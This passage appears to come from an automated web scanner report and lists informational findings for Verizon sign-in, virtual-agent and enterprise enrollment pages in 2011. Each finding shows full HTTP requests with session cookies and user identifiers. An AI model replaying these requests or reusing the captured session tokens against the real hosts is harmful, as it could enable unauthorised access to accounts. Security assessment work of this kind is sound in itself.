Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


23.2. https://collaborateext.verizon.com/aims/encore/VZCTC.serv

Summary

Severity:   Information
Confidence:   Certain
Host:   https://collaborateext.verizon.com
Path:   /aims/encore/VZCTC.serv

Request

GET /aims/encore/VZCTC.serv?appid=141&Source%20Title=Sign%20In&Source%20URL=https%3A//signin.verizon.com/sso/ResetAccount%3FgoFlow%3DresetAccount%23&lob=&initQ=Forgot%20User%20Credentials HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ResetAccount?goFlow=resetAccount
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:23:46 GMT
Content-length: 2567
Content-type: text/html; charset=ISO-8859-1
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM'
X-Powered-By: Servlet/2.5 JSP/2.1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
   <HEAD>
       <title>Your automated customer
...[SNIP]...

23.3. https://collaborateext.verizon.com/aims/encore/VzVAgent.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://collaborateext.verizon.com
Path:   /aims/encore/VzVAgent.jsp

Request

POST /aims/encore/VzVAgent.jsp?userId=EncoreSESS-EXT-PRODUCTION87802&encUserId=GUmEyiQO9Y8UAztLasJjctrSjnS0g36+tSa8hin5LSA= HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://collaborateext.verizon.com/aims/encore/VzVirtualAgent.jsp
Content-Length: 96
Cache-Control: max-age=0
Origin: https://collaborateext.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; NSC_dpmmbcfyubjnt_mcw=ffffffff8f64125045525d5f4f58455e445a4a422971

userId=EncoreSESS-EXT-PRODUCTION87802&encUserId=GUmEyiQO9Y8UAztLasJjctrSjnS0g36%2BtSa8hin5LSA%3D

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:23:49 GMT
Content-type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 54786


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <TITLE>Verizon Virtual Agen
...[SNIP]...

23.4. https://collaborateext.verizon.com/aims/encore/VzVirtualAgent.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://collaborateext.verizon.com
Path:   /aims/encore/VzVirtualAgent.jsp

Request

POST /aims/encore/VzVirtualAgent.jsp HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://collaborateext.verizon.com/aims/encore/VZCTC.serv?appid=141&Source%20Title=Sign%20In&Source%20URL=https%3A//signin.verizon.com/sso/ResetAccount%3FgoFlow%3DresetAccount%23&lob=&initQ=Forgot%20User%20Credentials
Content-Length: 451
Cache-Control: max-age=0
Origin: https://collaborateext.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; NSC_dpmmbcfyubjnt_mcw=ffffffff8f64125045525d5f4f58455e445a4a422971

appId=141&h_Brows_Info=&QUESCATNAME=&initQ=Forgot+User+Credentials&referer=https%3A%2F%2Fsignin.verizon.com%2Fsso%2FResetAccount%3FgoFlow%3DresetAccount&sourceTitle=Sign+In&sourceURL=https%3A%2F%2Fsig
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:23:47 GMT
Content-length: 1625
Content-type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1


<HTML>
<HEAD>
   <TITLE>Verizon Virtual Agent</TITLE>
   <script language="javascript" src="../includes/scripts/logClientErrors.js"></script>    
...[SNIP]...

23.5. https://collaborateext.verizon.com/aims/html/blank.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://collaborateext.verizon.com
Path:   /aims/html/blank.html

Request

GET /aims/html/blank.html HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://collaborateext.verizon.com/aims/encore/VzVAgent.jsp?userId=EncoreSESS-EXT-PRODUCTION87802&encUserId=GUmEyiQO9Y8UAztLasJjctrSjnS0g36+tSa8hin5LSA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; NSC_dpmmbcfyubjnt_mcw=ffffffff8f64125045525d5f4f58455e445a4a422971

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:23:52 GMT
Content-length: 175
Content-type: text/html
Last-modified: Wed, 13 Jul 2011 16:56:58 GMT
Etag: "af-4e1dce5a"
Accept-ranges: bytes

<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
</head>
<body></body></html>

23.6. https://dashboard.opinionlab.com/pv_controlboard.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://dashboard.opinionlab.com
Path:   /pv_controlboard.html

Request

GET /pv_controlboard.html HTTP/1.1
Host: dashboard.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:34:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/1.0.0 DAV/2 mod_python/3.3.1 Python/2.6
X-Server-Name: dash-apachevm02
Connection: close
Content-Type: text/html
Set-Cookie: NSC_Qvcmjd-Ebticpbse=ffffffff0912667945525d5f4f58455e445a4a423660;expires=Mon, 05-Sep-2011 22:49:47 GMT;path=/;secure;httponly
Content-Length: 16994

<html xmlns:date="http://exslt.org/dates-and-times">
<head>
<title>OpinionLab, Inc. | Dashboard V1.2</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
<meta content="" name="
...[SNIP]...

23.7. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/fonts/fonts_en.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/Default/tiles/LoginFlash/fonts/fonts_en.swf

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/fonts/fonts_en.swf HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/plain
Last-Modified: Sun, 17 Jul 2011 07:09:34 GMT
ETag: W/"cbd8-4e228aae"
Vary: accept-encoding
Date: Mon, 05 Sep 2011 22:26:39 GMT
Content-Length: 52184
Connection: keep-alive

CWS
...[SNIP]...

23.8. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/plain
Last-Modified: Sun, 17 Jul 2011 07:09:35 GMT
ETag: W/"11c07-4e228aaf"
Vary: accept-encoding
Content-Length: 72711
Date: Mon, 05 Sep 2011 22:26:50 GMT
Connection: keep-alive

CWS
...[SNIP]...

23.9. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010.swf HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/plain
Last-Modified: Sun, 17 Jul 2011 07:09:35 GMT
ETag: W/"193cb-4e228aaf"
Vary: accept-encoding
Content-Length: 103371
Date: Mon, 05 Sep 2011 22:26:22 GMT
Connection: keep-alive

CWS
...[SNIP]...

23.10. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/LoginFlash.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/plain
Last-Modified: Sun, 17 Jul 2011 07:09:35 GMT
ETag: W/"faa-4e228aaf"
Vary: accept-encoding
Cache-Control: private, max-age=21778
Date: Mon, 05 Sep 2011 22:26:21 GMT
Content-Length: 4010
Connection: keep-alive

CWS
...[SNIP]...

23.11. https://enterprisecenter.verizon.com/enterprisesolutions/Includes/Shared/struts/TealeafTarget.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/Includes/Shared/struts/TealeafTarget.jsp

Request

POST /enterprisesolutions/Includes/Shared/struts/TealeafTarget.jsp HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
Content-Length: 1304
Origin: https://enterprisecenter.verizon.com
X-TeaLeaf-Page-Render: 302
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.05.10.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

<ClientEventSet PostTimeStamp="1315279372165" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="302" DateSince1970="1315279364782" PageId="ID22H22M44S480R0.3107682520058006" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 105
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Mon, 05 Sep 2011 22:23:17 GMT
Connection: keep-alive
Vary: Accept-Encoding


<html>
<body>
Response

<hr>
Read 1304 bytes in 0ms.

</body>
</html>

23.12. https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/submitEnrollmentProfileInfo.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/default/selfreg/submitEnrollmentProfileInfo.do

Request

POST /enterprisesolutions/default/selfreg/submitEnrollmentProfileInfo.do HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
Content-Length: 233
Cache-Control: max-age=0
Origin: https://enterprisecenter.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; 